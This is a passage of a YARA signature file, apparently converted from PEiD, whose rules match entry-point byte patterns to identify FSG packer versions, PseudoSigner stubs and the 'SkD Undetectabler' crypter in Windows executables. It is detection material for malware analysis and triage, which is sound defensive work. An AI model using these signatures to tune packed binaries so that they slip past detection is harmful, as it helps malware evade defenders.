FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v11: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 ?? BF ?? 10 40 ?? BE ?? ?? ?? ?? FC B2 80 8A 06 46 88 07 47 02 D2 75 05 8A 16 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v10: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_ASM_: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_WinRAR_SFX: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_20_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule SkD_Undetectabler_3_No_FSG_2_Method_SkD_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 16 00 01 C7 85 F4 FD FF FF 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Microsoft_Visual_Cpp_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_131_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_FSG_131_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cue: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_Watcom_CCpp_EXE_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_dulekxt_Microsoft_Visual_Cpp_60_70: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cpp_1999: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32_Microsoft_Visual_Basic_: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB }\r\n        $b = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_V130Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_ASM_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 00 EB 02 82 B8 EB 01 10 8D 05 F4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Microsoft_Visual_Cpp_60: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB }\r\n        $b = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_MASM32_TASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_MASM32_TASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }\r\n        $b = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_ASM: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_MASM32_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_40_50: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }\r\n        $b = { EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 46 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 75 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v130_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_MASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_10_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_bartxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cppx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { CD 20 B8 03 00 CD 10 51 E8 00 00 5E 83 EE 09 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule SkD_Undetectabler_3_No_FSG_2_Method_SkD: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 16 00 01 C7 85 F4 FD FF FF 00 00 00 00 EB 0F 8B 8D F4 FD FF FF 83 C1 01 89 8D F4 FD FF FF 8B 95 F4 FD FF FF 3B 15 ?? 16 00 01 73 1C 8B 85 F4 FD FF FF 8B 0D ?? 16 00 01 8D 54 01 07 81 FA 74 10 00 01 75 02 EB 02 EB C7 8B 85 F4 FD FF FF 50 E8 ?? 00 00 00 83 C4 04 89 85 F0 FD FF FF 8B 8D F0 FD FF FF 89 4D FC C7 45 F8 00 00 00 00 EB 09 8B 55 F8 83 C2 01 89 55 F8 8B 45 F8 3B 85 F4 FD FF FF 73 15 8B 4D FC 03 4D F8 8B 15 ?? 16 00 01 03 55 F8 8A 02 88 01 EB D7 83 3D ?? 16 00 01 00 74 }\r\n        $b = { 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 16 00 01 C7 85 F4 FD FF FF 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_70: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 }\r\n        $b = { EB 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 4D 83 F6 4C 68 80 ?? ?? 00 EB 02 CD 20 5B EB 01 23 68 48 1C 2B 3A E8 02 00 00 00 38 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_50_60: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 